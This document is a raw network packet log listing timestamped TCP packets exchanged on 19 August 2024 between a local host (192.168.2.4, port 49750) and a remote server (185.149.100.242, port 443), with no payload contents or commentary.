Aug 19, 2024 09:28:25.040044069 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040060997 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.040075064 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.040393114 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040441036 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040462017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.040472984 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040501118 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.040512085 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.040966988 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041011095 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041037083 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041047096 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041062117 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041083097 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041157007 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041177988 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041213989 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041227102 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041240931 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041260004 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041743040 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041764975 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041800976 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041811943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.041837931 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.041865110 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047010899 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047041893 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047092915 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047106981 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047121048 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047146082 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047386885 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047415018 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047449112 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047457933 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.047476053 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.047493935 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048028946 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048054934 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048094034 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048101902 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048115969 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048130035 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048465967 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048507929 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048528910 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048538923 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048553944 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048582077 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048600912 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048626900 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048654079 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048662901 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.048690081 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048707008 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.048974037 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049001932 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049035072 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.049045086 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049062014 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.049082994 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.049423933 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049446106 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049483061 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.049490929 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.049508095 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.049519062 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084044933 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084089994 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084129095 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084161043 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084177017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084197044 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084407091 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084455967 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084475040 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084497929 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.084513903 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.084527969 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.115889072 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.115911961 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.115978956 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.115989923 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.116008043 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.116024971 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.116508961 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.116530895 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.116564035 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.116573095 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.116590977 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.116607904 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117121935 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117156029 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117196083 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117202997 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117218971 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117234945 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117671967 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117693901 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117728949 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117737055 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.117753029 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.117772102 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.118275881 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118297100 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118347883 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.118356943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118393898 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.118814945 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118837118 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118872881 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.118880987 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.118897915 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.118918896 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.174599886 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.174664021 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.174819946 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.174819946 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.174839020 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.174875975 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.175527096 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.175570965 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.175594091 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.175606012 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.175623894 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.175642014 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.206882954 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.206945896 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.207102060 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.207102060 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.207118988 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.207159996 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.207397938 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.207437992 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.207470894 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.207482100 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.207499981 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.207520008 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208234072 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208275080 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208307028 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208314896 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208343029 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208355904 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208722115 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208765984 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208791971 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208801985 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.208817005 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.208838940 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209100962 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209141016 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209167957 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209178925 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209192991 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209211111 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209615946 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209656954 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209683895 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209695101 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.209709883 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.209724903 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265297890 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265342951 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265388966 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265409946 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265440941 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265451908 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265665054 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265707016 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265733004 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265743971 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.265762091 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.265778065 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297126055 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297168016 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297353029 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297353029 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297369003 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297419071 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297678947 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297727108 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297751904 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297761917 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.297785997 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.297804117 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.298789978 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.298830986 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.298860073 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.298868895 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.298892021 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.298908949 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299278021 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299319029 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299348116 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299359083 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299375057 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299397945 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299863100 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299906015 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299933910 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299943924 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.299969912 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.299983025 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.300337076 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.300395012 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.300425053 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.300434113 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.300446987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.300471067 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356287956 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356334925 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356477976 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356477976 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356504917 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356548071 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356846094 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356889009 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356915951 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356926918 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.356947899 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.356969118 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388117075 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388159990 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388211012 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388231993 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388253927 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388272047 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388885975 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388927937 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388952971 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388966084 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.388988018 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.388998985 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.389925957 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.389966965 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.389992952 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390006065 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.390019894 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390032053 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390549898 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.390619040 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390628099 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.390662909 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.390687943 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390706062 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.390938997 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.390979052 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.391011953 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.391020060 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.391036987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.391052008 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.391242981 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.391284943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.391303062 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.391314030 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.391341925 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.391350985 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460000038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460036993 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460107088 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460167885 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460216999 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460237026 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460263968 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460388899 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460433960 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460449934 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460463047 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460503101 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460503101 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460733891 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460781097 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460798979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460810900 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.460836887 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.460850954 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461219072 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461266041 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461287975 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461298943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461328983 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461347103 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461776018 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461826086 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461846113 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461857080 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.461880922 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.461898088 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462053061 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462095976 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462126017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462132931 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462157011 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462167978 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462817907 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462868929 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462908030 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462914944 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.462928057 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.462951899 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463063002 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463114023 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463130951 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463150978 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463170052 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463181973 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463838100 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463885069 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463901043 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463912964 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.463937044 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.463956118 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.464065075 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464113951 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464133024 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.464143038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464178085 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.464190006 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.464895010 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464946985 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464966059 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.464977026 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.464999914 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465018034 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465118885 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465164900 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465181112 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465192080 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:26.465224981 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:26.465241909 CEST	49750	443	192.168.2.4	185.149.100.242
